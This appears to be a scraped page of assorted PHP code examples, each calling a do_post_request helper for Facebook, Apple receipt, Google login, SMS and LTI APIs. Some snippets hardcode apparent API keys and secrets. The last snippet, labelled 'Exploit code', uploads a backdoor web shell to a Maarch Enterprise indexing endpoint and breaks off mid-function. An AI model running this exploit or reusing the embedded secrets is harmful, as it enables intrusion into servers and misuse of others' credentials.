PHP do_post_request函数代码示例

 public function generateToken($pid, $username, $terminalType)
 {
     $APIversion = "0.1";
     $authType_Token = 0;
     $appAccountID_Token = $pid . "-" . $username;
     $userTerminalType_Token = $terminalType;
     $userTerminalSN_Token = time();
     $grantedCapabilityID_Token = "100<200<301<302<303<400";
     $callbackURL_Token = "www.baidu.com";
     $url_Token = "http://" . $this->restServer . "/RTC/ws/" . $APIversion . "/ApplicationID/" . $this->appid . "/CapabilityToken";
     $headers = "Content-Type: application/json\r\n";
     $headers .= "authorization: RTCAUTH,realm=AppServer,ApplicationId=" . $this->appid . ",APP_Key=" . $this->appkey;
     $postData_Token_arr['authType'] = $authType_Token;
     $postData_Token_arr['appAccountID'] = $appAccountID_Token;
     $postData_Token_arr['userTerminalType'] = $userTerminalType_Token;
     $postData_Token_arr['userTerminalSN'] = $userTerminalSN_Token;
     $postData_Token_arr['grantedCapabiltyID'] = $grantedCapabilityID_Token;
     $postData_Token_arr['callbackURL'] = $callbackURL_Token;
     $postData_Token_json = json_encode($postData_Token_arr);
     $header_Servers = array('http' => array('header' => $headers, 'timeout' => 6));
     $result_Token = do_post_request($url_Token, $postData_Token_json, $headers);
     $token_obj = json_decode($result_Token);
     $web_sip_password = $token_obj->capabilityToken;
     $token_back = $web_sip_password . "|" . $username . "|" . $pid . "|" . $this->appid . "|" . $userTerminalSN_Token . "|" . $userTerminalType_Token;
     //echo $token_back;
     $base64_token_back = base64_encode($token_back);
     return $base64_token_back;
 }

function UpdateGoogleKey($server, $username, $password, $database)
{
    global $gLoginKeyAttempts;
    global $gServerKey;
    try {
        $email = "<YOUR_EMAIL>";
        $password = "<YOUR_PASSWORD>";
        if ($gLoginKeyAttempts <= 3) {
            $gServerKey = do_post_request("https://www.google.com/accounts/ClientLogin", "accountType=HOSTED_OR_GOOGLE&Email={$email}&Passwd={$password}&service=ac2dm&source=teleknEsis-C2DMSample-1.0");
            if ($gServerKey && strlen($gServerKey) > 0) {
                $startIndex = strpos($gServerKey, "Auth=");
                $gServerKey = substr($gServerKey, $startIndex + 5);
                // Now I save the server key to a MySQL db
                $mysqli = new mysqli($server, $username, $password, $database);
                $result = $mysqli->query("CALL UpdateGoogleLoginKey( '{$gServerKey}' )");
            } else {
                // retry
                $gLoginKeyAttempts += 1;
                UpdateGoogleKey($server, $username, $password, $database);
            }
        } else {
            echo "ERROR UPDATING GOOGLE LOGIN KEY";
        }
    } catch (Exception $error) {
        echo "UpdateGoogleKey: " . $error->getMessage() . "\n";
    }
}

/**
* Sends an API request to Facebook
*
* @param array $parameters Array of parameters to send
* @param string $method The API function to call
* @return array Returns array of data returned
*/
function do_facebook_request($parameters, $method)
{
    if (empty($parameters) || empty($method)) {
        return false;
    }
    // Build Facebook args
    // http://developers.f8.facebook.com/documentation.php?v=1.0&doc=auth
    $data['api_key'] = 'API KEY';
    $data['method'] = $method;
    $data['v'] = '1.0';
    // Loop through and set as array
    foreach ($parameters as $key => $value) {
        $data[$key] = $value;
    }
    // Sort
    ksort($data);
    $args = '';
    foreach ($data as $key => $value) {
        $args .= $key . '=' . $value;
    }
    $data['sig'] = md5($args . 'secret');
    // Get a Facebook session
    $response = do_post_request('http://api.facebook.com/restserver.php', $data);
    // Handle XML [23]
    $xml = simplexml_load_string($response);
    return $xml;
}

/**
* Sends an API request to Facebook
*
* @param array $parameters Array of parameters to send
* @param string $method The API function to call
* @return array Returns array of data returned
*/
function do_facebook_request($parameters, $method)
{
    if (empty($parameters) || empty($method)) {
        return false;
    }
    // Build Facebook args
    // http://developers.f8.facebook.com/documentation.php?v=1.0&doc=auth
    $data['api_key'] = 'a4fe481e90134c25d517872e0a67e3ce';
    $data['method'] = $method;
    $data['v'] = '1.0';
    // Loop through and set as array
    foreach ($parameters as $key => $value) {
        $data[$key] = $value;
    }
    // Sort
    ksort($data);
    $args = '';
    foreach ($data as $key => $value) {
        $args .= $key . '=' . $value;
    }
    $data['sig'] = md5($args . 'e7452cf6aa4b5b039a25cd7b037676e9');
    // Get a Facebook session
    $response = do_post_request('http://api.facebook.com/restserver.php', $data);
    //echo $response;
    // Handle XML
    $xml = simplexml_load_string($response);
    print_r($xml);
    //return $xml;
}

function translate($item, $from, $to)
{
    $url = str_replace(" ", "%20", "http://ajax.googleapis.com/ajax/services/language/translate?v=1.0&q=" . $item . "&langpair=" . $from . "%7C" . $to);
    $result = do_post_request($url);
    // now, process the JSON string
    return json_decode($result)->{'responseData'}->{'translatedText'};
    // now have some fun with the results...
}

 function buildImage($ditaa)
 {
     $args = array();
     $args['ditaa'] = $ditaa;
     $args['no-antialias'] = $this->antialias ? 0 : 1;
     $args['no-shadows'] = $this->shadows ? 0 : 1;
     $args['scale'] = $this->scale;
     $args['round-corners'] = $this->round_corners ? 1 : 0;
     $args['no-separations'] = $this->separations ? 0 : 1;
     return do_post_request($this->url, $args);
 }

function validateReceipt($receiptdata, $devmode = FALSE)
{
    if ($devmode) {
        $appleURL = "https://sandbox.itunes.apple.com/verifyReceipt";
    } else {
        $appleURL = "https://buy.itunes.apple.com/verifyReceipt";
    }
    $receipt = json_encode(array("receipt-data" => $receiptdata));
    $response_json = do_post_request($appleURL, $receipt);
    $response = json_decode($response_json);
    return $response;
}

function validateReceiptAbonnement($hex, $testing = 1)
{
    $password = "2e3013503b56480ba27122c398c9e74d";
    if ($testing == 1) {
        $url = 'https://sandbox.itunes.apple.com/verifyReceipt';
    } else {
        $url = 'https://buy.itunes.apple.com/verifyReceipt';
    }
    $postData = json_encode(array('receipt-data' => $hex, 'password' => $password));
    $response_json = do_post_request($url, $postData);
    $response = json_decode($response_json);
    return $response;
}

function check()
{
    global $error;
    global $CONST;
    if (isset($_POST["usernamesignup"]) && isset($_POST["anweshasignup"]) && isset($_POST["passwordsignup"]) && isset($_POST['6_letters_code'])) {
    } else {
        $error["msg"] = 'Incomplete request';
        $error['component'] = 'username';
        return;
    }
    $user = $_POST["usernamesignup"];
    $anw = $_POST["anweshasignup"];
    $pass = $_POST["passwordsignup"];
    /**
     * validating captcha
     */
    if (empty($_SESSION['6_letters_code']) || $_SESSION['6_letters_code'] != $_POST['6_letters_code']) {
        $error["msg"] = "The captcha code does not match!";
        $error["component"] = "captcha";
        return;
    }
    /**
     * getting the status of login in anwesha website
     */
    $url = 'http://2016.anwesha.info/login/';
    $data = array('username' => $anw, 'password' => $pass);
    $data = http_build_query($data);
    $reply = do_post_request($url, $data);
    $res = (array) json_decode($reply);
    /**
     * getting the login status
     */
    if (!$res['status']) {
        $error["msg"] = "Authentication failed. You entered an incorrect Anwesha ID or password.";
        $error["component"] = "anwesha";
        return;
    }
    $hash = sha1($pass);
    if (!checkUsername($user)) {
        $error["msg"] = "Username already taken.";
        $error["component"] = "username";
        return;
    }
    if (!filter_var($user, FILTER_VALIDATE_REGEXP, array("options" => array('regexp' => '/^[\\w]{5,15}$/')))) {
        $error["msg"] = "Inappropriate username (5 to 15 alphanumeric characters needed)";
        $error["component"] = "username";
        return;
    }
    // var_dump($CONT);
}

function ticket_post($name, $email, $topicId, $subject, $message, $ticket_type_id = '')
{
    global $ticket_post_url;
    $pri = "2";
    $dept_id = "1";
    $fields = array('name' => urlencode($name), 'email' => urlencode($email), 'topicId' => urlencode($topicId), 'subject' => urlencode($subject), 'tickettype' => urlencode($ticket_type_id), 'dept_id' => urlencode($dept_id), 'pri' => urlencode($pri), 'message' => urlencode($message));
    $fields_string = '';
    $response = '';
    foreach ($fields as $key => $value) {
        $fields_string .= $key . '=' . $value . '&';
    }
    rtrim($fields_string, '&');
    try {
        $response = do_post_request($ticket_post_url, $fields_string);
    } catch (Exception $e) {
    }
    return $response;
}

 function getsListPhone()
 {
     $ip = "";
     $Signature = md5(API_TOKEN);
     $url = $this->api_url . "/api/getsListPhone";
     $data = array('API_TOKEN' => API_TOKEN, 'Signature' => $Signature, 'Ip' => $ip);
     $response = do_post_request($url, $data);
     switch ($response) {
         case '-110':
             $result['code'] = $response;
             $result['msg'] = 'Mã bảo mật không chính xác';
         case '-111':
             $result['code'] = $response;
             $result['msg'] = 'Chữ ký điện tử không hợp lệ';
         default:
             $result['code'] = $response;
             $result['msg'] = '';
     }
     return $result;
 }

function immediate_update_outcome_in_canvas($oauth_consumer_key, $secret, $lti_sourced_id, $lis_outcome_service_url, $score)
{
    set_time_limit(180);
    $xmlRequest = "<?xml version = \"1.0\" encoding = \"UTF-8\"?>\n<imsx_POXEnvelopeRequest xmlns=\"http://www.imsglobal.org/services/ltiv1p1/xsd/imsoms_v1p0\">\n    <imsx_POXHeader>\n        <imsx_POXRequestHeaderInfo>\n            <imsx_version>V1.0</imsx_version>\n            <imsx_messageIdentifier>999999123</imsx_messageIdentifier>\n        </imsx_POXRequestHeaderInfo>\n    </imsx_POXHeader>\n    <imsx_POXBody>\n        <replaceResultRequest>\n            <resultRecord>\n                <sourcedGUID>\n                    <sourcedId>{$lti_sourced_id}</sourcedId>\n                </sourcedGUID>\n                <result>\n                    <resultScore>\n                        <language>en</language>\n                        <textString>" . $score . "</textString>\n                    </resultScore>\n                </result>\n            </resultRecord>\n        </replaceResultRequest>\n    </imsx_POXBody>\n</imsx_POXEnvelopeRequest>";
    $hash = base64_encode(sha1($xmlRequest, TRUE));
    $params = array('oauth_body_hash' => $hash);
    $hmac_method = new OAuthSignatureMethod_HMAC_SHA1();
    $consumer = new OAuthConsumer($oauth_consumer_key, $secret, NULL);
    $req = OAuthRequest::from_consumer_and_token($consumer, NULL, 'POST', $lis_outcome_service_url, $params);
    $req->sign_request($hmac_method, $consumer, NULL);
    $params = $req->get_parameters();
    $header = $req->to_header();
    $header .= "\nContent-type: application/xml";
    $ext_response = do_post_request($lis_outcome_service_url, $xmlRequest, $header);
    $ext_doc = new DOMDocument();
    set_error_handler(array($this, 'HandleXmlError'));
    $ext_doc->loadXML($ext_response);
    restore_error_handler();
    $ext_nodes = domnode_to_array($ext_doc->documentElement);
    if (!isset($ext_nodes['imsx_POXHeader']['imsx_POXResponseHeaderInfo']['imsx_statusInfo']['imsx_codeMajor'])) {
        throw new Exception("No imsx_codeMajor from outcome service for " . $lti_sourced_id);
    }
    if ($ext_nodes['imsx_POXHeader']['imsx_POXResponseHeaderInfo']['imsx_statusInfo']['imsx_codeMajor'] != 'success' && isset($ext_nodes['imsx_POXHeader']['imsx_POXResponseHeaderInfo']['imsx_statusInfo']['imsx_description']) && $ext_nodes['imsx_POXHeader']['imsx_POXResponseHeaderInfo']['imsx_statusInfo']['imsx_description'] != 'User is no longer in course') {
        throw new Exception("No success code from outcome service for " . $lti_sourced_id);
    }
}

function tsv_sms_enviar($telefono, $mensaje, $firma)
{
    $datos = array('telefono' => $telefono, 'mensaje' => $mensaje, 'firma' => $firma, 'enviar' => '¡Enviar Mensaje!');
    return do_post_request('http://sms.todosv.com/index.php?visual=estado', http_build_query($datos));
}

define('IN_MOBIQUO', 1);
if (isset($_GET['allowAccess'])) {
    echo "yes";
    exit;
}
if (isset($_GET['checkip'])) {
    print do_post_request(array('ip' => 1), true);
} else {
    $output = 'Tapatalk Push Notification Status Monitor<br><br>';
    $output .= 'Push notification test: <b>';
    require_once dirname(dirname(__FILE__)) . '/SSI.php';
    global $modSettings, $smcFunc;
    if (isset($modSettings['tp_push_key']) && !empty($modSettings['tp_push_key'])) {
        $push_key = $modSettings['tp_push_key'];
        $return_status = do_post_request(array('test' => 1, 'key' => $push_key), true);
        if ($return_status === '1') {
            $output .= 'Success</b>';
        } else {
            $output .= 'Failed</b><br />' . $return_status;
        }
    } else {
        $output .= 'Failed</b><br />Please set Tapatalk API Key at forum option/setting<br />';
    }
    //$ip =  do_post_request(array('ip' => 1), true);
    $forum_url = get_forum_path();
    $table_exist = mobi_table_exist('tapatalk_users') ? 'Yes' : 'No';
    $output .= "<br>Current forum url: " . $forum_url . "<br>";
    //$output .="Current server IP: ".$ip."<br>";
    $output .= "Tapatalk user table existence:" . $table_exist . "<br>";
    if (isset($modSettings['push_slug'])) {

Exploit code :

<?php 
/* EXPLOIT URL  */
$target_url = "http://website.target/apps/maarch_enterprise/";
/* EMPTY FOR OLDS VERSIONS LIKE LETTERBOX 2.3 */
$indexing_path = "indexing_searching/";
/* TARGET UPLOAD FILE */
$target_file = "file_to_index.php";
/* FILE TO UPLOAD IN SAME PATH AS THIS SCRIPT */
$file = "backdoor.php";
/* NAME, EMPTY WITH LETTERBOX */
$name = "shell";
/* LAUNCHING EXPLOIT */
do_post_request($target_url . $indexing_path . $target_file . "?md5=" . $name, $target_url, $file, $name);
function do_post_request($url, $res, $file, $name)
{
    $data = "";
    $boundary = "---------------------" . substr(md5(rand(0, 32000)), 0, 10);
    $data .= "--{$boundary}\n";
    $fileContents = file_get_contents($file);
    $md5 = md5_file($file);
    $ext = pathinfo($file, PATHINFO_EXTENSION);
    $data .= "Content-Disposition: form-data; name=\"file\"; filename=\"file.php\"\n";
    $data .= "Content-Type: text/plain\n";
    $data .= "Content-Transfer-Encoding: binary\n\n";
    $data .= $fileContents . "\n";
    $data .= "--{$boundary}--\n";
    $params = array('http' => array('method' => 'POST', 'header' => 'Content-Type: multipart/form-data; boundary=' . $boundary, 'content' => $data));
    $ctx = stream_context_create($params);